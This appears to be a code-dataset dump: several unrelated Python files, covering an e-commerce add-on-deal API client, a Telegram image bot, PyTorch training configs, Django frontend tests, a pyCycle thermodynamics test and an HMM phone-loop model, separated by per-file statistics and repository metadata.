- purchase_min_spend
- per_gift_num
- promotion_purchase_limit
- sub_item_priority
- add_on_deal_name
"""
return self.client.execute("add_on_deal/update_add_on_deal", "POST", kwargs)
def update_add_on_deal_main_item(self, **kwargs):
"""
Update Add-on Deal Main Item
:param kwargs:
- add_on_deal_id Required
- main_item_list Required
- item_id Required
- status Required
"""
return self.client.execute("add_on_deal/update_add_on_deal_main_item", "POST", kwargs)
def update_add_on_deal_sub_item(self, **kwargs):
"""
Update Add-on Deal Sub Item
:param kwargs:
- add_on_deal_id Required
- sub_item_list Required
- item_id
- model_id
- status
- sub_item_input_price
- sub_item_limit
"""
return self.client.execute("add_on_deal/update_add_on_deal_sub_item", "POST", kwargs)
def end_add_on_deal(self, **kwargs):
"""
End Add-on Deal
:param kwargs:
- add_on_deal_id Required
"""
return self.client.execute("add_on_deal/end_add_on_deal", "POST", kwargs)
| 26.568966
| 94
| 0.588146
| 594
| 4,623
| 4.173401
| 0.079125
| 0.141186
| 0.254135
| 0.129891
| 0.912465
| 0.886244
| 0.833401
| 0.689794
| 0.616378
| 0.579669
| 0
| 0
| 0.320787
| 4,623
| 174
| 95
| 26.568966
| 0.78949
| 0.386762
| 0
| 0
| 0
| 0
| 0.249646
| 0.225106
| 0
| 0
| 0
| 0
| 0
| 1
| 0.466667
| false
| 0
| 0.033333
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
d7925fceec9a18048da35875e2aadc112e6e7427
| 35
|
py
|
Python
|
apps/home/views/__init__.py
|
mpita/echolearn
|
110e65036dafa20ae5e129c32df69a3df6b14c42
|
[
"MIT"
] | null | null | null |
apps/home/views/__init__.py
|
mpita/echolearn
|
110e65036dafa20ae5e129c32df69a3df6b14c42
|
[
"MIT"
] | null | null | null |
apps/home/views/__init__.py
|
mpita/echolearn
|
110e65036dafa20ae5e129c32df69a3df6b14c42
|
[
"MIT"
] | null | null | null |
from .home import HomeTemplateView
| 17.5
| 34
| 0.857143
| 4
| 35
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 35
| 1
| 35
| 35
| 0.967742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d792df39ead377549d51d9fab328a350e623e0d1
| 468
|
py
|
Python
|
frsclient/service/v2/__init__.py
|
xunmeibuyue/IntelligentPeephole
|
c3bebf8792f019c859539607846971f33fee7cc2
|
[
"Apache-2.0"
] | null | null | null |
frsclient/service/v2/__init__.py
|
xunmeibuyue/IntelligentPeephole
|
c3bebf8792f019c859539607846971f33fee7cc2
|
[
"Apache-2.0"
] | null | null | null |
frsclient/service/v2/__init__.py
|
xunmeibuyue/IntelligentPeephole
|
c3bebf8792f019c859539607846971f33fee7cc2
|
[
"Apache-2.0"
] | null | null | null |
from frsclient.service.v2.api_collection_v2 import ApiCollectionV2
from frsclient.service.v2.compare_service import CompareServiceV2
from frsclient.service.v2.detect_service import DetectServiceV2
from frsclient.service.v2.face_service import FaceServiceV2
from frsclient.service.v2.face_set_service import FaceSetServiceV2
from frsclient.service.v2.live_detect_service import LiveDetectServiceV2
from frsclient.service.v2.search_service import SearchServiceV2
| 58.5
| 73
| 0.880342
| 59
| 468
| 6.813559
| 0.338983
| 0.226368
| 0.348259
| 0.383085
| 0.129353
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034642
| 0.074786
| 468
| 7
| 74
| 66.857143
| 0.893764
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
ad0aec65bca175c951f755b156f9aafedc388920
| 2,303
|
py
|
Python
|
nazurin/sites/Moebooru/commands.py
|
diclotgtest/nazurin
|
d695bc4b7ff9d54c9066f50ef4fb60f15acbc837
|
[
"MIT"
] | null | null | null |
nazurin/sites/Moebooru/commands.py
|
diclotgtest/nazurin
|
d695bc4b7ff9d54c9066f50ef4fb60f15acbc837
|
[
"MIT"
] | null | null | null |
nazurin/sites/Moebooru/commands.py
|
diclotgtest/nazurin
|
d695bc4b7ff9d54c9066f50ef4fb60f15acbc837
|
[
"MIT"
] | null | null | null |
from aiogram.dispatcher import filters
from aiogram.types import Message
from nazurin import bot, dp
from .api import Moebooru
moebooru = Moebooru()
@dp.message_handler(
filters.RegexpCommandsFilter(regexp_commands=[r'/yandere (\S+)']))
async def yandere_view(message: Message, regexp_command):
try:
post_id = int(regexp_command.group(1))
if post_id < 0:
await message.reply('Invalid post id!')
return
illust = await moebooru.site('yande.re').view(post_id)
await bot.sendIllust(illust, message)
except (IndexError, ValueError):
await message.reply('Usage: /yandere <post_id>')
@dp.message_handler(
filters.RegexpCommandsFilter(regexp_commands=[r'/yandere_download (\S+)']))
async def yandere_download(message: Message, regexp_command):
try:
post_id = int(regexp_command.group(1))
if post_id <= 0:
await message.reply('Invalid post id!')
return
illust = await moebooru.site('yande.re').view(post_id)
await illust.download()
await bot.sendDocuments(illust, message)
except (IndexError, ValueError):
await message.reply('Usage: /yandere_download <post_id>')
@dp.message_handler(
filters.RegexpCommandsFilter(regexp_commands=[r'/konachan (\S+)']))
async def konachan_view(message: Message, regexp_command):
try:
post_id = int(regexp_command.group(1))
if post_id < 0:
await message.reply('Invalid post id!')
return
illust = await moebooru.site('konachan.com').view(post_id)
await bot.sendIllust(illust, message)
except (IndexError, ValueError):
await message.reply('Usage: /konachan <post_id>')
@dp.message_handler(
filters.RegexpCommandsFilter(regexp_commands=[r'/konachan_download (\S+)'])
)
async def konachan_download(message: Message, regexp_command):
try:
post_id = int(regexp_command.group(1))
if post_id <= 0:
await message.reply('Invalid post id!')
return
illust = await moebooru.site('konachan.com').view(post_id)
await illust.download()
await bot.sendDocuments(illust, message)
except (IndexError, ValueError):
await message.reply('Usage: /konachan_download <post_id>')
| 35.984375
| 79
| 0.668693
| 275
| 2,303
| 5.454545
| 0.174545
| 0.08
| 0.090667
| 0.061333
| 0.849333
| 0.849333
| 0.849333
| 0.849333
| 0.849333
| 0.801333
| 0
| 0.004417
| 0.213634
| 2,303
| 63
| 80
| 36.555556
| 0.823854
| 0
| 0
| 0.678571
| 0
| 0
| 0.130265
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ad26c34183524c16230815d12c619544487cafe6
| 4,846
|
py
|
Python
|
opt.py
|
QuIIL/Scale-Embedding-Shared-Neural-Network
|
3e3ed852e8b6a8bd0aeba37b20d067e618cb3728
|
[
"MIT"
] | null | null | null |
opt.py
|
QuIIL/Scale-Embedding-Shared-Neural-Network
|
3e3ed852e8b6a8bd0aeba37b20d067e618cb3728
|
[
"MIT"
] | null | null | null |
opt.py
|
QuIIL/Scale-Embedding-Shared-Neural-Network
|
3e3ed852e8b6a8bd0aeba37b20d067e618cb3728
|
[
"MIT"
] | null | null | null |
import torch.optim as optim
scale_embedding = {
'nr_classes' : 2,
'training_phase' : [
# {
# 'nr_epochs' : 30,
# 'optimizer' : [
# optim.Adam,
# { # should match keyword for parameters within the optimizer
# 'lr' : 5.0e-5, # initial learning rate,
# 'weight_decay' : 0.02
# }
# ],
# 'scheduler' : None, # learning rate scheduler
# 'train_batch_size' : 4,
# 'infer_batch_size' : 4,
# 'freeze' : True,
# # path to load, -1 to auto load checkpoint from previous phase,
# # None to start from scratch
# 'pretrained' : 'resnet50-19c8e357.pth',
# },
# {
# 'nr_epochs' : 30,
# 'optimizer' : [
# optim.Adam,
# { # should match keyword for parameters within the optimizer
# 'lr' : 2.5e-5, # initial learning rate,
# 'weight_decay' : 0.02
# }
# ],
# 'scheduler' : None, # learning rate scheduler
# 'train_batch_size' : 4,
# 'infer_batch_size' : 4,
# 'freeze' : False,
# # path to load, -1 to auto load checkpoint from previous phase,
# # None to start from scratch
# 'pretrained' : -1,
# },
{
'nr_epochs' : 60,
'optimizer' : [
optim.Adam,
{ # should match keyword for parameters within the optimizer
'lr' : 1.0e-4, # initial learning rate,
# 'weight_decay' : 0.02
}
],
'scheduler' : lambda x : optim.lr_scheduler.StepLR(x, 30), # learning rate scheduler
'train_batch_size' : 2,
'infer_batch_size' : 4,
'freeze' : False,
# path to load, -1 to auto load checkpoint from previous phase,
# None to start from scratch
'pretrained' : 'resnet50-19c8e357.pth',
},
],
}
scale_add = {
'nr_classes' : 2,
'training_phase' : [{
'nr_epochs' : 30,
'optimizer' : [
optim.Adam,
{ # should match keyword for parameters within the optimizer
'lr' : 1.0e-4, # initial learning rate,
'weight_decay' : 0.02 # weight decay is L2 regularizer
}
],
'scheduler' : None, # learning rate scheduler
'train_batch_size' : 4,
'infer_batch_size' : 4,
'freeze' : True,
# path to load, -1 to auto load checkpoint from previous phase,
# None to start from scratch
'pretrained' : 'resnet50-19c8e357.pth',
}],
}
scale_concat = {
'nr_classes' : 2,
'training_phase' : [{
'nr_epochs' : 30,
'optimizer' : [
optim.Adam,
{ # should match keyword for parameters within the optimizer
'lr' : 1.0e-4, # initial learning rate,
'weight_decay' : 0.02
}
],
'scheduler' : None, # learning rate scheduler
'train_batch_size' : 4,
'infer_batch_size' : 4,
'freeze' : True,
# path to load, -1 to auto load checkpoint from previous phase,
# None to start from scratch
'pretrained' : 'resnet50-19c8e357.pth',
}],
}
scale_conv = {
'nr_classes' : 2,
'training_phase' : [{
'nr_epochs' : 30,
'optimizer' : [
optim.Adam,
{ # should match keyword for parameters within the optimizer
'lr' : 1.0e-4, # initial learning rate,
'weight_decay' : 0.02
}
],
'scheduler' : None, # learning rate scheduler
'train_batch_size' : 4,
'infer_batch_size' : 4,
'freeze' : True,
# path to load, -1 to auto load checkpoint from previous phase,
# None to start from scratch
'pretrained' : 'resnet50-19c8e357.pth',
}],
}
baseline = {
'nr_classes' : 2,
'training_phase' : [{
'nr_epochs' : 30,
'optimizer' : [
optim.Adam,
{ # should match keyword for parameters within the optimizer
'lr' : 1.0e-4, # initial learning rate,
'weight_decay' : 0.02
}
],
'scheduler' : None, # learning rate scheduler
'train_batch_size' : 4,
'infer_batch_size' : 4,
'freeze' : True,
# path to load, -1 to auto load checkpoint from previous phase,
# None to start from scratch
'pretrained' : 'resnet50-19c8e357.pth',
}],
}
| 32.965986
| 97
| 0.475856
| 469
| 4,846
| 4.795309
| 0.144989
| 0.0747
| 0.057803
| 0.0747
| 0.940418
| 0.940418
| 0.924855
| 0.924855
| 0.924855
| 0.924855
| 0
| 0.0474
| 0.416632
| 4,846
| 146
| 98
| 33.191781
| 0.748143
| 0.422204
| 0
| 0.695652
| 0
| 0
| 0.241202
| 0.03849
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.01087
| 0
| 0.01087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ad3ac284afdd9255b9762bfc9783219139ee6367
| 6,330
|
py
|
Python
|
socialdistribution/app/tests.py
|
CMPUT404-Project-Group/CMPUT404-Group-Project
|
e541cc609f260d7221fe0be8975c5b2444d74af0
|
[
"W3C-20150513"
] | null | null | null |
socialdistribution/app/tests.py
|
CMPUT404-Project-Group/CMPUT404-Group-Project
|
e541cc609f260d7221fe0be8975c5b2444d74af0
|
[
"W3C-20150513"
] | 44
|
2021-10-14T15:44:46.000Z
|
2021-12-05T00:57:23.000Z
|
socialdistribution/app/tests.py
|
CMPUT404-Project-Group/Social-Distribution-CMPUT404-Group-Project
|
e541cc609f260d7221fe0be8975c5b2444d74af0
|
[
"W3C-20150513"
] | 1
|
2021-12-07T01:14:14.000Z
|
2021-12-07T01:14:14.000Z
|
from django.test import Client, TestCase
from api.models import User
from api.tests.utils import TestUtils
class FrontEndRouteTest(TestCase):
"""
Tests that all routes return correct repsonses and use correct templates.
"""
def setUp(self):
self.c = Client()
self.dn = 'frontend'
self.p = 'frontendtests1'
self.user = User.objects.create_user(
email='[email protected]',
displayName=self.dn,
github='frontend',
password=self.p,
type='author'
)
def test_login_form(self):
response = self.c.get('/app/accounts/login/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'registration/login.html')
def test_register_form(self):
response = self.c.get('/app/register/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'app/register.html')
def test_index(self):
# should redirect if user not logged in
response = self.c.get('/app/')
self.assertEqual(response.status_code, 302)
self.assertTemplateNotUsed(response, 'app/index.html')
# log in
self.c.login(displayName=self.dn, password=self.p)
response = self.c.get('/app/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'app/index.html')
self.c.logout()
def test_inbox(self):
# should redirect if user not logged in
response = self.c.get(f'/app/author/{self.user.id}/inbox/')
self.assertEqual(response.status_code, 302)
self.assertTemplateNotUsed(response, 'app/inbox.html')
# CAN'T TEST THIS UNLESS WE MOCK THE INBOX REQUEST SOMEHOW?
# # log in
# self.c.login(displayName=self.dn, password=self.p)
# response = self.c.get(f'/app/author/{self.user.id}/inbox/')
# self.assertEqual(response.status_code, 200)
# self.assertTemplateUsed(response, 'app/inbox.html')
# self.c.logout()
def _create_post(self):
self.c.login(displayName=self.dn, password=self.p)
response = self.c.get(f'/app/create-post/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'posts/create_post.html')
def test_edit_post(self):
self.c.login(displayName=self.dn, password=self.p)
post = TestUtils.get_test_post(author=self.user)
response = self.c.get(f'/app/posts/edit-post/{post.id}')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'posts/edit_post.html')
self.c.logout()
def test_delete_post(self):
# should redirect if user not logged in
post = TestUtils.get_test_post(author=self.user)
response = self.c.get(f'/app/posts/delete-post/{post.id}')
self.assertEqual(response.status_code, 403)
self.assertTemplateNotUsed(response, 'app/inbox.html')
# should allow logged in user to delete
self.c.login(displayName=self.dn, password=self.p)
response = self.c.get(f'/app/posts/delete-post/{post.id}')
self.assertEqual(response.status_code, 200)
self.c.logout()
def test_view_post(self):
self.c.login(displayName=self.dn, password=self.p)
post = TestUtils.get_test_post(author=self.user)
response = self.c.get(f'/app/posts/{post.id}')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'posts/view_post.html')
self.c.logout()
def test_create_comment(self):
self.c.login(displayName=self.dn, password=self.p)
post = TestUtils.get_test_post(author=self.user)
response = self.c.get(f'/app/posts/{post.id}/create-comment')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'comments/create_comment.html')
self.c.logout()
def test_view_comments(self):
self.c.login(displayName=self.dn, password=self.p)
post = TestUtils.get_test_post(author=self.user)
response = self.c.get(f'/app/posts/{post.id}/comments')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'comments/comments.html')
self.c.logout()
def test_view_profile(self):
# should redirect if not logged in
response = self.c.get('/app/profile/')
self.assertEqual(response.status_code, 302)
self.assertTemplateNotUsed(response, 'profile/view_profile.html')
self.c.login(displayName=self.dn, password=self.p)
response = self.c.get('/app/profile/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'profile/view_profile.html')
self.c.logout()
def test_manage_profile(self):
# should redirect if not logged in
response = self.c.get('/app/profile/manage/')
self.assertEqual(response.status_code, 302)
self.assertTemplateNotUsed(response, 'profile/manage_profile.html')
self.c.login(displayName=self.dn, password=self.p)
response = self.c.get('/app/profile/manage/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'profile/manage_profile.html')
self.c.logout()
def test_view_other_user(self):
other_user = User.objects.create_user(
email='[email protected]',
displayName='other',
github='other',
password=self.p,
type='author'
)
self.c.login(displayName=self.dn, password=self.p)
response = self.c.get(f'/app/profile/{other_user.id}')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'profile/view_other_user.html')
self.c.logout()
def test_logout(self):
self.c.login(displayName=self.dn, password=self.p)
response = self.c.get('/app/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'app/index.html')
self.c.get('/app/accounts/logout/')
response = self.c.get('/app/')
self.assertEqual(response.status_code, 302)
self.assertTemplateNotUsed(response, 'app/index.html')
| 37.678571
| 78
| 0.649131
| 794
| 6,330
| 5.086902
| 0.11335
| 0.054469
| 0.041594
| 0.079228
| 0.829661
| 0.808368
| 0.767022
| 0.708591
| 0.699926
| 0.683585
| 0
| 0.012373
| 0.221169
| 6,330
| 168
| 79
| 37.678571
| 0.806897
| 0.093207
| 0
| 0.533898
| 0
| 0
| 0.148537
| 0.081801
| 0
| 0
| 0
| 0
| 0.313559
| 1
| 0.127119
| false
| 0.110169
| 0.025424
| 0
| 0.161017
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
ad45a7af91c5f3b0e9f72dc94827599ef0e1b042
| 20
|
py
|
Python
|
tftime/model/__init__.py
|
nagikomo/time-series-model
|
3a1a2b447c5bdabce9a0e24b6439854e3e599887
|
[
"MIT"
] | 7
|
2022-03-08T16:04:45.000Z
|
2022-03-12T13:04:54.000Z
|
tftime/model/__init__.py
|
nagikomo/time-series-model
|
3a1a2b447c5bdabce9a0e24b6439854e3e599887
|
[
"MIT"
] | 6
|
2022-03-08T04:51:05.000Z
|
2022-03-11T13:40:43.000Z
|
tftime/model/__init__.py
|
nagikomo/time-series-model
|
3a1a2b447c5bdabce9a0e24b6439854e3e599887
|
[
"MIT"
] | 1
|
2022-03-10T18:42:03.000Z
|
2022-03-10T18:42:03.000Z
|
from .sam import *
| 10
| 19
| 0.65
| 3
| 20
| 4.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 20
| 1
| 20
| 20
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ad4d86cf7a31b5d4a96fa2e362253cc9c70b8ae2
| 91
|
py
|
Python
|
modulepackage/decorator_assembly/spam/bar.py
|
Chyi341152/chyi-book
|
ddeaf49d69a68f5718c20c3b7fe6fd37381d21eb
|
[
"MIT"
] | null | null | null |
modulepackage/decorator_assembly/spam/bar.py
|
Chyi341152/chyi-book
|
ddeaf49d69a68f5718c20c3b7fe6fd37381d21eb
|
[
"MIT"
] | null | null | null |
modulepackage/decorator_assembly/spam/bar.py
|
Chyi341152/chyi-book
|
ddeaf49d69a68f5718c20c3b7fe6fd37381d21eb
|
[
"MIT"
] | null | null | null |
# bar.py
from . import export
@export
class Bar(object):
pass
print('bar imported')
| 9.1
| 21
| 0.67033
| 13
| 91
| 4.692308
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.208791
| 91
| 9
| 22
| 10.111111
| 0.847222
| 0.065934
| 0
| 0
| 0
| 0
| 0.144578
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.4
| 0
| 0.6
| 0.2
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
ad7110b998e4ace78009eaff5c87ea02c37cecbc
| 5,411
|
py
|
Python
|
pycycle/thermo/cea/test/test_mix_ratio.py
|
askprash/pyCycle
|
e0845d7e320b6cb47367734c26ec3410c9fa5bf7
|
[
"Apache-2.0"
] | null | null | null |
pycycle/thermo/cea/test/test_mix_ratio.py
|
askprash/pyCycle
|
e0845d7e320b6cb47367734c26ec3410c9fa5bf7
|
[
"Apache-2.0"
] | null | null | null |
pycycle/thermo/cea/test/test_mix_ratio.py
|
askprash/pyCycle
|
e0845d7e320b6cb47367734c26ec3410c9fa5bf7
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import numpy as np
import openmdao.api as om
from openmdao.utils.assert_utils import assert_near_equal, assert_check_partials
from pycycle.thermo.cea import species_data
from pycycle.constants import AIR_ELEMENTS, AIR_FUEL_ELEMENTS
from pycycle.thermo.cea.thermo_add import ThermoAdd
class ThermoAddTestCase(unittest.TestCase):
def test_mix_1fuel(self):
thermo_spec = species_data.janaf
air_thermo = species_data.Properties(thermo_spec, init_elements=AIR_ELEMENTS)
p = om.Problem()
fuel = 'JP-7'
p.model = ThermoAdd(inflow_thermo_data=thermo_spec, mix_thermo_data=thermo_spec,
inflow_elements=AIR_ELEMENTS, mix_mode='reactant',
mix_elements=fuel, mix_names='fuel')
p.setup(force_alloc_complex=True)
# p['Fl_I:stat:P'] = 158.428
p['Fl_I:stat:W'] = 38.8
p['Fl_I:tot:h'] = 181.381769
p['Fl_I:tot:composition'] = air_thermo.b0
p['fuel:ratio'] = 0.02673
p.run_model()
tol = 5e-7
assert_near_equal(p['mass_avg_h'], 176.65965638, tolerance=tol)
assert_near_equal(p['Wout'], 39.837124, tolerance=tol)
assert_near_equal(p['fuel:W'], p['Fl_I:stat:W']*p['fuel:ratio'], tolerance=tol)
assert_near_equal(p['composition_out'], np.array([0.0003149, 0.00186566, 0.00371394, 0.05251212, 0.01410888]), tolerance=tol)
# data = p.check_partials(out_stream=None, method='cs')
data = p.check_partials(method='cs')
assert_check_partials(data, atol=1.e-6, rtol=1.e-6)
def test_mix_2fuel(self):
thermo_spec = species_data.janaf
air_thermo = species_data.Properties(thermo_spec, init_elements=AIR_ELEMENTS)
p = om.Problem()
fuel = 'JP-7'
p.model = ThermoAdd(inflow_thermo_data=thermo_spec, mix_thermo_data=thermo_spec,
inflow_elements=AIR_ELEMENTS, mix_mode='reactant',
mix_elements=[fuel, fuel], mix_names=['fuel1','fuel2'])
p.setup(force_alloc_complex=True)
# p['Fl_I:stat:P'] = 158.428
p['Fl_I:stat:W'] = 38.8
p['Fl_I:tot:h'] = 181.381769
p['Fl_I:tot:composition'] = air_thermo.b0
# half the ratio from the 1 fuel test
ratio = 0.02673/2.
p['fuel1:ratio'] = ratio
p['fuel2:ratio'] = ratio
p.run_model()
tol = 5e-7
assert_near_equal(p['mass_avg_h'], 176.65965638, tolerance=tol)
assert_near_equal(p['Wout'], 39.837124, tolerance=tol)
assert_near_equal(p['fuel1:W'], p['Fl_I:stat:W']*ratio, tolerance=tol)
assert_near_equal(p['fuel2:W'], p['Fl_I:stat:W']*ratio, tolerance=tol)
assert_near_equal(p['composition_out'], np.array([0.0003149, 0.00186566, 0.00371394, 0.05251212, 0.01410888]), tolerance=tol)
data = p.check_partials(out_stream=None, method='cs')
# data = p.check_partials(method='cs')
assert_check_partials(data, atol=1.e-6, rtol=1.e-6)
def test_mix_1flow(self):
thermo_spec = species_data.janaf
p = om.Problem()
p.model = ThermoAdd(inflow_thermo_data=thermo_spec, mix_thermo_data=thermo_spec,
inflow_elements=AIR_FUEL_ELEMENTS, mix_mode='flow',
mix_elements=AIR_ELEMENTS, mix_names='mix')
p.setup(force_alloc_complex=True)
p['Fl_I:stat:W'] = 62.15
p['Fl_I:tot:composition'] = [0.000313780313538, 0.0021127831122, 0.004208814234964, 0.052325087161902, 0.014058631311261]
p['mix:W'] = 4.44635
p['mix:composition'] = [3.23319258e-04, 1.10132241e-05, 5.39157736e-02, 1.44860147e-02]
p.run_model()
tol = 5e-7
assert_near_equal(p['Wout'], 62.15+4.44635, tolerance=tol)
# assert_near_equal(p['composition_out'], np.array([0.0003149, 0.00186566, 0.00371394, 0.05251212, 0.01410888]), tolerance=tol)
assert_near_equal(p['composition_out'], np.array([0.00031442, 0.00197246, 0.00392781, 0.05243129, 0.01408717]), tolerance=tol)
def test_mix_2flow(self):
thermo_spec = species_data.janaf
p = om.Problem()
p.model = ThermoAdd(inflow_thermo_data=thermo_spec, mix_thermo_data=thermo_spec,
inflow_elements=AIR_FUEL_ELEMENTS, mix_mode='flow',
mix_elements=[AIR_ELEMENTS, AIR_ELEMENTS], mix_names=['mix1', 'mix2'])
p.setup(force_alloc_complex=True)
p['Fl_I:stat:W'] = 62.15
# p['Fl_I:tot:h'] = 181.381769
p['Fl_I:tot:composition'] = [0.000313780313538, 0.0021127831122, 0.004208814234964, 0.052325087161902, 0.014058631311261]
p['mix1:W'] = 4.44635/2
p['mix1:composition'] = [3.23319258e-04, 1.10132241e-05, 5.39157736e-02, 1.44860147e-02]
p['mix2:W'] = 4.44635/2
p['mix2:composition'] = [3.23319258e-04, 1.10132241e-05, 5.39157736e-02, 1.44860147e-02]
p.run_model()
tol = 5e-7
assert_near_equal(p['Wout'], 62.15+4.44635, tolerance=tol)
# assert_near_equal(p['composition_out'], np.array([0.0003149, 0.00186566, 0.00371394, 0.05251212, 0.01410888]), tolerance=tol)
assert_near_equal(p['composition_out'], np.array([0.00031442, 0.00197246, 0.00392781, 0.05243129, 0.01408717]), tolerance=tol)
if __name__ == "__main__":
unittest.main()
| 35.598684
| 135
| 0.635927
| 773
| 5,411
| 4.227684
| 0.172057
| 0.04896
| 0.073439
| 0.073439
| 0.836903
| 0.823133
| 0.820073
| 0.820073
| 0.820073
| 0.820073
| 0
| 0.175292
| 0.225097
| 5,411
| 152
| 136
| 35.598684
| 0.604102
| 0.085197
| 0
| 0.62069
| 0
| 0
| 0.094699
| 0
| 0
| 0
| 0
| 0
| 0.183908
| 1
| 0.045977
| false
| 0
| 0.08046
| 0
| 0.137931
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ad8253869c8418ffec6fd1159b470f6e8d99d461
| 8,290
|
py
|
Python
|
beer/models/phoneloop.py
|
bolajiy/beer
|
6fe968c7ca4864437890aa6bd705755c2580696e
|
[
"MIT"
] | 46
|
2018-02-27T18:15:08.000Z
|
2022-02-16T22:10:55.000Z
|
beer/models/phoneloop.py
|
bolajiy/beer
|
6fe968c7ca4864437890aa6bd705755c2580696e
|
[
"MIT"
] | 16
|
2018-01-26T14:18:51.000Z
|
2021-02-05T09:34:00.000Z
|
beer/models/phoneloop.py
|
bolajiy/beer
|
6fe968c7ca4864437890aa6bd705755c2580696e
|
[
"MIT"
] | 26
|
2018-03-12T14:03:26.000Z
|
2021-05-24T21:15:01.000Z
|
import torch
from .hmm import HMM
from .categorical import Categorical
from .categoricalset import CategoricalSet
from .parameters import ConjugateBayesianParameter
from ..utils import logsumexp
__all__ = ['PhoneLoop', 'BigramPhoneLoop']
class PhoneLoop(HMM):
'Phone Loop HMM.'
@classmethod
def create(cls, graph, start_pdf, end_pdf, modelset, categorical=None,
prior_strength=1.0):
'''Create a PhoneLoop model.
Args:
graph (:any:`CompiledGraph`): Decoding graph of the
phone-loop.
start_pdf (dict): Mapping symbol/start state of the
corresponding sub-HMM.
end_pdf (dict): Mapping symbol/end state of the
corresponding sub-HMM.
categorical (``Categorical``): Categorical model of the
mixing weights.
prior_strength (float): Strength of the prior over the
weights.
'''
# We look at one parameter to check the type of the model.
bayes_param = modelset.mean_field_factorization()[0][0]
tensor = bayes_param.prior.natural_parameters()
dtype, device = tensor.dtype, tensor.device
if categorical is None:
weights = torch.ones(len(start_pdf), dtype=dtype, device=device)
weights /= len(start_pdf)
categorical = Categorical.create(weights, prior_strength)
return cls(graph, modelset, start_pdf, end_pdf, categorical)
def __init__(self, graph, modelset, start_pdf, end_pdf, categorical):
super().__init__(graph, modelset)
self.start_pdf = start_pdf
